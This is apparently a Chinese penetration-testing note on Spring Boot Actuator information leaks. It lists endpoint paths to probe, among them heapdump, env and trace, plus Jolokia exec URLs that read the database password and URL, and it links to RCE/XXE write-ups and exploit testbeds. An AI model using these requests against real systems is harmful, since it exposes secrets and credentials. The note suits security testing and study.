Spring Boot Actuator 信息泄露

基本

https://movie.example.com/GatewayApi/env/java.home

GatewayApi/autoconfig
GatewayApi/configprops
GatewayApi/beans
GatewayApi/dump
GatewayApi/env
GatewayApi/env/java.home
GatewayApi/health
GatewayApi/info
GatewayApi/mappings
GatewayApi/metrics
GatewayApi/metrics/mem
GatewayApi/metrics/
GatewayApi/features
GatewayApi/trace
GatewayApi/auditevents
GatewayApi/loggers
GatewayApi/heapdump

常见测试路径

https://www.example.com/autoconfig
https://www.example.com/configprops
https://www.example.com/beans
https://www.example.com/dump
https://www.example.com/env
https://www.example.com/env/java.home
https://www.example.com/health
https://www.example.com/info
https://www.example.com/mappings
https://www.example.com/metrics
https://www.example.com/metrics/mem
https://www.example.com/metrics/
https://www.example.com/features
https://www.example.com/trace
https://www.example.com/auditevents
https://www.example.com/loggers
https://www.example.com/heapdump
https://www.example.com/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password
https://www.example.com/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url
https://www.example.com/jolokia/list

参考资料

https://www.jianshu.com/p/af9738634a21

SpringBoot 命令执行漏洞分析 与 PoC (爱奇艺安全应急响应中心)
exploit-spring-boot-actuators
link

Spring Boot Actuator Jolokia RCE/XXE 复现
https://b1ue.cn/archives/111.html

https://github.com/chaitin/xray/pull/470

Actuator
https://github.com/chaitin/xray/issues/35

搭建测试环境
https://b1ue.cn/archives/111.html
https://github.com/artsploit/actuator-testbed
https://github.com/mpgn/Spring-Boot-Actuator-Exploit

• #Java
• #Penetration Testing